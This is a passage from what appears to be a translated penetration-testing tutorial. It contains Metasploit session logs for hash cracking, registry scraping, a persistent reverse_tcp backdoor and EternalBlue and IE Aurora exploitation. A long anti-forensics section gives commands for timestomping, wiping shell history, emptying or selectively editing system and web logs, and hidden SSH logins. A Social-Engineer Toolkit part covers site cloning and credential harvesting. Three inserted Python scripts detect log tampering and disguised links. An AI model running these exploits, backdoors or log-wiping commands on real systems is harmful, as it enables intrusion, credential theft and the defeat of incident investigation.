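Running it reports Administrator and Guest as empty passwords, recovers 123456 for 小铃铛, and leaves xiang unresolved; for real work, feed the loot file to John the Ripper or hashcat (mode 1000) instead of this wordlist, and treat an unbroken NT hash as still usable for pass-the-hash.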
Capturing traffic on the target
The target must run the rpcapd service; on Windows it is installed together with WinPcap.
meterpreter > run post/windows/manage/rpcapd_start
[*] Checking if machine DESKTOP-9A8VFKB has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002)
[+] Rpcapd started successfully: C:\Program Files (x86)\winpcap\rpcapd.exe -d -p 2002 -n
The -n flag starts rpcapd without authentication, and the module opens the firewall for it, so anyone who can reach port 2002 can sniff the host; remove the service when the engagement is over.
Gathering system information
Windows 10
meterpreter > run scraper
[*] New session on 192.168.0.106:7216...
[*] Gathering basic system information...
[-] Failed to run command net view
[-] Error: Rex::TimeoutError Operation timed out.
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Users\xiang\AppData\Local\Temp\WLNUaYcc.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[-] Failed to run command reg.exe export HKLM C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg
[-] Error: Rex::TimeoutError Operation timed out.
[*] Downloading HKLM (C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg)
[*] Exception: Rex::Post::
Windows 7
meterpreter > run scraper
[*] New session on 192.168.0.158:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\sbOwIdlG.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\pQzbPtfD.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\xdgVency.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\aWoyKSRV.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\abgTRNGl.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.0.158:445...
Windows 2003
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > run scraper
[*] New session on 192.168.0.169:1438...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IatUIdPZ.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JcjKKLfF.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gLgAxVWq.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\KDJAycay.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\zebuwlsT.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.0.169:1438...
Persistence
meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106
-X: start the agent automatically at boot (autorun entry under HKLM)
-i 50: retry the connection every 50 seconds
-p 8888: connect back to port 8888
-r 192.168.0.106: the host to connect back to (LHOST of the handler)
meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-2VEIIKHJ7M8_20220628.5835/WIN-2VEIIKHJ7M8_20220628.5835.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888
[*] Persistent agent script is 99674 bytes long
[+] Persistent Script written to C:\Windows\TEMP\QQxsjpmT.vbs
[*] Executing script C:\Windows\TEMP\QQxsjpmT.vbs
[+] Agent executed with PID 2580
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMB
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMB
Succeeded on Windows 7. Writing to HKLM\...\Run needs an elevated session. Keep the cleanup .rc file that the script prints: running it (resource <path>) removes the VBS file and the autorun value at the end of the engagement, and the agent will otherwise keep calling back every 50 seconds after every reboot.
Upgrading a command shell to Meterpreter
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -z
-z: on success leave the new session in the background instead of interacting with it (setg sets the option globally, for every module)
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.158:49321) at 2022-06-28 14:13:48 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 3 created in the background.
msf6 exploit(windows/smb/ms17_010_eternalblue) > session -u 3
[-] Unknown command: session
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.150:4433
msf6 exploit(windows/smb/ms17_010_eternalblue) >
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 4 opened (192.168.0.150:4433 -> 192.168.0.158:49325) at 2022-06-28 14:14:39 +0800
[*] Stopping exploit/multi/handler
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > irb
[*] Starting IRB shell...
[*] You are in the "client" (session) object
irb: warn: can't alias kill from irb_kill.
>> fs.dir.pwd
=> "C:\\Windows\\system32"
The command is sessions -u <id> (plural). It is meant for plain command shell sessions, for example one produced by a windows/x64/shell_reverse_tcp payload; since the payload here was already Meterpreter, the "upgrade" simply spawned a second Meterpreter session (4) next to session 3.
Exploiting the Internet Explorer "Aurora" vulnerability (MS10-002)
Windows XP
msf6 > use exploit/windows/browser/ms10_002_aurora
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.150    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/browser/ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set URIPATH /
URIPATH => /
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > exploit -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:443
[*] Using URL: http://192.168.0.150/
[*] Server started.
msf6 exploit(windows/browser/ms10_002_aurora) >
[*] 192.168.0.106 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
This is a client-side (browser) exploit: nothing happens until a victim opens http://192.168.0.150/ in a vulnerable Internet Explorer, which is why "no session was created" is printed immediately and the page is only served once the client connects. SRVPORT 80 and LPORT 443 are chosen so that both the lure and the callback look like ordinary web traffic.
Covering tracks
Once a goal has been reached, people sometimes deface the site to show off, leave a backdoor so the box can be used as a zombie, or plant a cryptominer. Do not do any of this: all of it is illegal.
What follows only shows how to remove some of the traces left behind after an intrusion. It cannot remove all of them; complete erasure of intrusion traces is impossible. The aim is to raise the time and effort an administrator needs to identify the intruder. If the administrator is determined to look, something will be found no matter how carefully you clean.
The priority is therefore hiding your own identity: the best practice is to go through a proxy before the intrusion and then clean up traces afterwards.
Windows
PowerShell commands for changing file timestamps
$(Get-Date), or its alias $(DATE), is the current date and time;
$(Get-Date "11/04/2019 20:42:23") is a specific date and time parsed from a string (month/day/year);
$(Get-Item abc.txt) is the file object;
$(Get-Item abc.txt).CreationTime is the file's creation time;
$(Get-Item abc.txt).LastAccessTime is the last access time;
$(Get-Item abc.txt).LastWriteTime is the last modification time.
# Set the timestamps of abc.txt to the current time
$(Get-Item abc.txt).CreationTime = $(Get-Date)
$(Get-Item abc.txt).LastAccessTime = $(Get-Date)
$(Get-Item abc.txt).LastWriteTime = $(Get-Date)
# Set the timestamps of abc.txt to a specific time
$(Get-Item abc.txt).CreationTime = $(Get-Date "11/04/2019 20:42:23")
$(Get-Item abc.txt).LastAccessTime = $(Get-Date "11/04/2019 20:42:23")
$(Get-Item abc.txt).LastWriteTime = $(Get-Date "11/04/2019 20:42:23")
These assignments only rewrite the $STANDARD_INFORMATION timestamps of the NTFS record. The $FILE_NAME attribute in the MFT keeps its own set of timestamps that normal file APIs cannot change, and the USN change journal records the update itself, so forensic tools that compare the two attributes will flag the file as timestomped.
Other records
Clearing the "Run" history
- The Start menu "Run" dialog keeps the programs and the file paths and names that were opened through it.
- Open the Registry Editor, go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU and delete the entries you do not want others to see.
Clearing the "Search" history
- (1) Searches for computers
- Open the Registry Editor, go to HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5647 and delete the entries you do not want seen.
- (2) Searches for files
- Open the Registry Editor, go to HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603 and delete the entries you do not want seen.
Clearing "My Recent Documents"
- Right-click the taskbar and open "Taskbar and Start Menu Properties". Under "Start Menu" click "Customize", then "Advanced", and press "Clear List" to remove every recently opened document (see Figure 2).
- To remove only specific entries, open C:\Documents and Settings\Administrator (your own account)\Recent in Explorer and delete the shortcuts you do not want seen.
Hiding the name of the last logged-on user
Open the Registry Editor, go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon, create a string value named DontDisplayLastUserName and set it to 1. After a reboot the last user name is no longer shown at logon; set it back to 0 when you want it shown again.
The registry paths and folders above are from Windows XP. On Windows Vista and later the recent-items folder is %APPDATA%\Microsoft\Windows\Recent, and the last-user setting is the DontDisplayLastUserName DWORD under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
Clearing the Recycle Bin
- Deleting a file in Windows normally only moves it to the Recycle Bin, from which it can be restored and read at any time. The safer way is to hold Shift while deleting, or to right-click the desktop "Recycle Bin", choose "Properties", select "Use one setting for all drives" on the "Global" tab, tick "Do not move files to the Recycle Bin. Remove files immediately when deleted" and click "OK".
Clearing the clipboard
- The clipboard can hold a surprising amount of sensitive material. If you walk away without shutting down, the next person only has to press Ctrl+V to read it. There is no need to find a way to empty it: copy some harmless text with Ctrl+C and the old contents are overwritten.
Clearing the TEMP folder
- Many applications save intermediate results temporarily. Before leaving, delete the temporary files under C:\Documents and Settings\Administrator (the logged-on user)\Local Settings\Temp on the system drive.
Linux
Changing file timestamps
ls -l test.txt
# change the file's modification time and access time
touch -d "2018-04-18 08:00:00" test.txt
touch -t 0101080000 test
Clearing the shell history
# Method 1
history                  # show the command history (does not work on Kali Linux)
cat ~/.bash_history      # the history file
vim ~/.bash_history
history -c
# Method 2
# Open a file with vim and tell vim not to record commands (vim saves its command history in the viminfo file).
vim test.txt
:set history=0
:!command
# Method 3
# Edit /etc/profile so the system no longer saves command history. By default 1000 commands are kept; set the value to 0, save, exit and reboot so the change takes effect.
HISTSIZE=0
# Method 4
# Run the following after logging in so that no history (.bash_history) is recorded
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
# Method 5
# Kali Linux only
rm -rf /root/.zsh_history
Clearing system log traces
/var/log/btmp      records all failed logins; view with lastb
/var/log/lastlog   records the last login time of every user; view with lastlog
/var/log/wtmp      records all user logins and logouts; view with last
/var/run/utmp      records the users currently logged in; view with w, who, users
/var/log/secure    security-related log messages
/var/log/messages  system messages and errors since boot
echo > /var/log/btmp               # clear failed-login records (viewed with lastb)
echo > /var/log/wtmp               # clear successful-login records (viewed with last)
echo > /var/log/lastlog            # clear last-login times (viewed with lastlog)
echo > /var/run/utmp               # clear current-login records (viewed with w, who, users)
cat /dev/null > /var/log/secure    # clear the security log
cat /dev/null > /var/log/messages  # clear the system log
echo > /var/log/secure             # login information
echo > /var/log/messages
echo > /var/log/syslog             # the system logging service
echo > /var/log/xferlog
echo > /var/log/auth.log
echo > /var/log/user.log
cat /dev/null > /var/adm/syslog
cat /dev/null > /var/log/maillog
cat /dev/null > /var/log/openwebmail.log
cat /dev/null > /var/log/mail.info
Selectively editing system log traces
# Emptying the log files completely is too easy for an administrator to notice; deleting or replacing only the key entries hides the attack traces far more effectively.
# Delete every line matching a string, for example the current date or your own login IP
sed -i '/your-ip/d' test.txt
sed -i '/192.168.1.2/d' test.txt
# Globally replace a login IP address:
sed 's/old-string/new-string/g'
sed -i 's/192.168.1.1/192.168.1.2/g' test.txt
Hiding remote SSH login records
# Log in without a TTY so the session is not shown by w, who or last.
ssh -T root@192.168.0.1 /bin/bash -i
# Do not record the server's host key in the local .ssh directory
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i
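The wipes above (echo > /var/log/wtmp) and the no-TTY login (ssh -T ... /bin/bash -i) leave different gaps, and a defender can look for both. The script below is an added example, not part of the original page or of any tool it mentions: it parses wtmp records (assuming the glibc x86_64 struct utmp layout, 384 bytes per record), reports truncation, odd file sizes and entries whose timestamps run backwards, and then cross-checks sshd "Accepted" lines against USER_PROCESS records, so a login that sshd accepted but that never produced a utmp/wtmp entry stands out. The wtmp bytes and auth-log lines are constructed inline; the auth lines are assumed to use rsyslog's ISO-8601 high-precision timestamp format.

```python
# Added example, not code from the original page: check a wtmp file for the marks
# that wiping or splicing leaves, and cross-check it against sshd's own log.
# Assumes the glibc x86_64 struct utmp layout (384-byte records) and auth-log
# lines with rsyslog's ISO-8601 high-precision timestamps. All sample data below
# is constructed here, not captured from a real host.
import re
import struct
from datetime import datetime, timezone
from typing import Dict, List, Tuple

UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"   # ut_type, ut_pid, ut_line, ut_id, ut_user,
UTMP_SIZE = struct.calcsize(UTMP_FMT)       # ut_host, ut_exit, ut_session, ut_tv, ut_addr_v6
USER_PROCESS, DEAD_PROCESS = 7, 8


def _cstr(raw: bytes) -> str:
    return raw.split(b"\0", 1)[0].decode(errors="replace")


def pack_record(ut_type: int, pid: int, line: str, user: str, host: str, tv_sec: int) -> bytes:
    """Build one utmp record; used here only to construct sample data."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


def parse_wtmp(data: bytes) -> List[Dict]:
    """Decode every complete record; a trailing partial record is ignored."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append({"type": f[0], "pid": f[1], "line": _cstr(f[2]),
                        "user": _cstr(f[4]), "host": _cstr(f[5]), "time": f[9]})
    return records


def check_wtmp(data: bytes) -> List[str]:
    """Structural anomalies left by 'echo > /var/log/wtmp' or by hand-editing."""
    problems = []
    if not data:
        problems.append("wtmp is empty: login history was truncated")
    elif len(data) % UTMP_SIZE:
        problems.append(f"size {len(data)} is not a multiple of {UTMP_SIZE}: file was cut or edited")
    recs = parse_wtmp(data)
    for i in range(1, len(recs)):
        if recs[i]["time"] < recs[i - 1]["time"]:
            problems.append(f"record {i} is older than record {i - 1}: entries reordered or spliced")
    return problems


ACCEPTED = re.compile(r"^(\S+) \S+ sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port \d+")


def parse_accepted(lines: List[str]) -> List[Dict]:
    """Pull (time, user, host) out of sshd 'Accepted <method> for <user> from <ip>' lines."""
    out = []
    for line in lines:
        m = ACCEPTED.match(line)
        if m:
            out.append({"time": datetime.fromisoformat(m.group(1)).timestamp(),
                        "user": m.group(2), "host": m.group(3)})
    return out


def logins_without_session(auth_lines: List[str], wtmp_data: bytes, window: int = 10) -> List[Tuple[str, str]]:
    """Logins sshd accepted that never produced a USER_PROCESS record: either a
    no-PTY session (ssh -T ... /bin/bash -i) or a wtmp that was wiped afterwards."""
    sessions = [r for r in parse_wtmp(wtmp_data) if r["type"] == USER_PROCESS]
    missing = []
    for a in parse_accepted(auth_lines):
        if not any(s["user"] == a["user"] and s["host"] == a["host"]
                   and abs(s["time"] - a["time"]) <= window for s in sessions):
            missing.append((a["user"], a["host"]))
    return missing


def _iso(ts: int) -> str:
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()


T0 = 1572900000  # constructed base time (epoch seconds)
SAMPLE_WTMP = b"".join([
    pack_record(USER_PROCESS, 2001, "pts/0", "alice", "10.0.0.5", T0),
    pack_record(USER_PROCESS, 2002, "pts/1", "bob", "10.0.0.6", T0 + 60),
    pack_record(DEAD_PROCESS, 2001, "pts/0", "", "", T0 + 120),
])
SAMPLE_AUTH = [
    f"{_iso(T0)} srv sshd[2001]: Accepted publickey for alice from 10.0.0.5 port 50122 ssh2",
    f"{_iso(T0 + 60)} srv sshd[2002]: Accepted password for bob from 10.0.0.6 port 50130 ssh2",
    f"{_iso(T0 + 300)} srv sshd[2003]: Accepted publickey for root from 192.168.0.1 port 50140 ssh2",
]

if __name__ == "__main__":
    print(check_wtmp(SAMPLE_WTMP) or "wtmp structure looks intact")
    print("accepted logins with no session record:", logins_without_session(SAMPLE_AUTH, SAMPLE_WTMP))
```

sshd logs every accepted authentication regardless of whether a TTY is allocated, so its log (auth.log or secure) is the authoritative record; the comparison is only trustworthy when that log is shipped off the host as it is written, because the same echo > commands listed above empty it just as easily.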
Clearing web intrusion traces
# Replace the IP address in the log directly
sed -i 's/192.168.166.85/192.168.1.1/g' apache/logs/access.log
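Replacing one address with sed, as above, leaves the file the same size with the line order intact, so size checks and monotonic-timestamp checks do not catch it. What does is an integrity record kept somewhere the web host cannot rewrite. The script below is an added example, not from the page: each log line is HMAC-chained to the previous one, a collector keeps the chain as lines arrive, and comparing a recomputed chain against it locates the first line that was edited, removed or added. The access-log lines are constructed for illustration and KEY is a placeholder.

```python
# Added example (not from the page): hash-chain log lines so that edits, deletions
# or insertions anywhere in the file are located by comparing against the chain a
# remote collector kept. Sample access-log lines are constructed; KEY is a placeholder.
import hashlib
import hmac
from typing import List, Optional

KEY = b"placeholder-collector-key"  # assumption: held by the log collector, never on the web host
SEED = b"\0" * hashlib.sha256().digest_size


def chain(lines: List[str], key: bytes = KEY) -> List[str]:
    """Link i = HMAC(key, link i-1 || line i); every later link depends on every earlier line."""
    prev = SEED
    links = []
    for line in lines:
        prev = hmac.new(key, prev + line.encode(), hashlib.sha256).digest()
        links.append(prev.hex())
    return links


def first_divergence(lines: List[str], trusted: List[str], key: bytes = KEY) -> Optional[int]:
    """Index of the first line whose recomputed link differs from the trusted chain,
    or None if the local file still matches. A file that was shortened or extended
    diverges at the length of the shorter side."""
    local = chain(lines, key)
    for i, (ours, theirs) in enumerate(zip(local, trusted)):
        if not hmac.compare_digest(ours, theirs):
            return i
    if len(local) != len(trusted):
        return min(len(local), len(trusted))
    return None


# Constructed Apache-style access log; the second and third lines carry the address
# that the sed command above rewrites.
ACCESS_LOG = [
    '192.168.1.50 - - [04/Nov/2019:20:40:01 +0800] "GET /index.html HTTP/1.1" 200 512',
    '192.168.166.85 - - [04/Nov/2019:20:40:09 +0800] "GET /admin/login HTTP/1.1" 200 1043',
    '192.168.166.85 - - [04/Nov/2019:20:40:12 +0800] "POST /admin/login HTTP/1.1" 302 0',
    '10.0.0.7 - - [04/Nov/2019:20:40:30 +0800] "GET /robots.txt HTTP/1.1" 404 209',
]
TRUSTED_CHAIN = chain(ACCESS_LOG)  # what the collector stored as the lines arrived

if __name__ == "__main__":
    rewritten = [l.replace("192.168.166.85", "192.168.1.1") for l in ACCESS_LOG]  # effect of sed s///g
    deleted = [l for l in ACCESS_LOG if "192.168.166.85" not in l]                 # effect of sed /ip/d
    print("intact:", first_divergence(ACCESS_LOG, TRUSTED_CHAIN))
    print("rewritten diverges at line", first_divergence(rewritten, TRUSTED_CHAIN))
    print("deleted diverges at line", first_divergence(deleted, TRUSTED_CHAIN))
```

The chain only has value if the key and the stored links live on the collector: a chain file kept next to access.log can be recomputed by whoever has write access to the log. In practice the same property comes from shipping lines to a remote syslog or WORM store as they are written, which is the mitigation the commands above are working around.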
# Common log locations
Apache
%APACHE_HOME%/logs/access.log   # access log
%APACHE_HOME%/logs/error.log    # error log
Nginx
%NGINX_HOME%/logs/access.log    # access log
%NGINX_HOME%/logs/error.log     # error log
Tomcat
%TOMCAT_HOME%/logs/localhost_access_log.YYYY-MM-DD.txt  # request log
%TOMCAT_HOME%/logs/catalina.YYYY-MM-DD.log              # startup log
%TOMCAT_HOME%/logs/localhost.YYYY-MM-DD.log             # localhost log
%TOMCAT_HOME%/logs/host-manager.YYYY-MM-DD.log          # host-manager application log
%TOMCAT_HOME%/logs/manager.YYYY-MM-DD.log               # manager application log
Clearing MySQL traces
rm ~/.mysql_history
cat /dev/null > ~/.mysql_history
Social engineering
git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
cd setoolkit
pip3 install -r requirements.txt
python setup.py
gedit /etc/setoolkit/set.config
Spear-Phishing Attack Vector
Generates a backdoor by way of a file-format vulnerability (for example in PDF) and sends it as an e-mail attachment (via GMAIL, SENDMAIL, ...) to the target, luring them into opening the attachment and triggering the backdoor.
Example:
# cd /usr/share/set
# ./setoolkit
select from the menu
1) Social-Engineering Attacks
1) Perform a Mass Email Attack
3) Credential Harvester Attack Method
2) Site Cloner
…
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.150]: 192.168.0.150
set:webattack> Enter the url to clone: www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Web attacks
SET can clone a website and plant a backdoor in it, so that a target who is tricked into opening the site is compromised.
Java Applet method
One of the most successful methods. It does not exploit a Java vulnerability: when the target browses the backdoored fake site, the browser asks whether to allow the Java applet in the page to run. Once the user clicks allow, the payload runs and the target is redirected to the real site.
Client-side web exploit method
Exploits a vulnerability in the user's client software; a 0-day generally gives the best results.
Username and Password Harvesting
Clones a target site and lures the target into logging in, capturing their credentials, for example a GMAIL password.
Tabnabbing: the target opens several tabs and switches between them; the site detects this and shows a "please wait" message. When the target returns to the hijacked tab, a strikingly similar site asks them to enter their login credentials. Once entered, the credentials are captured and the target is redirected to the real site.
Man-Left-in-the-Middle attack
Uses HTTP requests from an already compromised website, or an XSS vulnerability in a site, to send the user's login details to the attacker's HTTP server. If you find an XSS vulnerability in a site, you can build a URL around it, send it to the target and capture their login details when they open it and log in.
Web Jacking
When the target opens our site they see a link displaying the correct web address; clicking this fake link redirects them to our fake site, where their login details are captured.
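The Web Jacking and phishing vectors above both rely on a link whose visible text names one site while its href points at another. The script below is an added example, not part of SET or of the original page: it extracts anchors from an HTML fragment (constructed here, using the page's harvester address 192.168.0.150 as the real destination) and reports every anchor whose displayed hostname differs from the hostname the href actually leads to, which is the check mail gateways and browser extensions apply to rendered messages.

```python
# Added example, not part of SET or of the original page: find anchors whose visible
# text names one host while the href leads to another. The HTML fragment is constructed.
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

# Visible text that "looks like" a URL or bare hostname; group 1 is the hostname shown.
SHOWN_HOST = re.compile(r"^(?:https?://)?(?:www\.)?([a-z0-9.-]+\.[a-z]{2,})(?:[/:?#].*)?$", re.I)


def _strip_www(host: str) -> str:
    return host[4:] if host.startswith("www.") else host


def real_host(href: str) -> str:
    """Hostname the href actually leads to; '' for javascript:, mailto:, relative or empty hrefs."""
    parsed = urlparse(href)
    if not parsed.scheme and not parsed.netloc:      # "example.com/x" or "/relative"
        parsed = urlparse("//" + href)
    return _strip_www((parsed.hostname or "").lower())


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""

    def __init__(self) -> None:
        super().__init__()
        self.anchors: List[Tuple[str, str]] = []
        self._href = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def mismatched_links(html: str) -> List[Tuple[str, str]]:
    """(displayed text, real host) for anchors whose text names a different host.

    A subdomain of the displayed host (text example.com, href status.example.com)
    is accepted; anchors with no resolvable host or with non-URL text are skipped.
    """
    collector = AnchorCollector()
    collector.feed(html)
    collector.close()
    out = []
    for href, text in collector.anchors:
        m = SHOWN_HOST.match(text)
        if not m:
            continue                              # "Click here" and similar: nothing to compare
        shown = _strip_www(m.group(1).lower())
        real = real_host(href)
        if real and real != shown and not real.endswith("." + shown):
            out.append((text, real))
    return out


# Constructed message body; the first anchor is the Web Jacking pattern described above.
SAMPLE_HTML = """
<p>Please review your account: <a href="http://192.168.0.150/login">https://accounts.example.com/login</a></p>
<p><a href="https://www.example.com/help">www.example.com</a></p>
<p><a href="https://status.example.com/">example.com</a></p>
<p><a href="https://evil.example.net/">Click here</a></p>
"""

if __name__ == "__main__":
    for text, host in mismatched_links(SAMPLE_HTML):
        print(f"link text {text!r} actually goes to {host}")
```

The check catches the displayed-address trick but not a lookalike domain chosen to match the text, so it belongs beside domain-age and reputation checks rather than in place of them.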
Multi-attack mode
Several of the above attacks can be combined to raise the success rate.
Infectious Media Generator
Lets you build a CD or USB drive containing an autorun.inf that runs a specified backdoor or file-format exploit file.
Teensy USB HID (mini USB human interface device)
When the USB device is plugged in and autorun.inf is disabled on the machine, this method makes the device emulate a keyboard or mouse and can then capture keystrokes on the target.
Other SET features
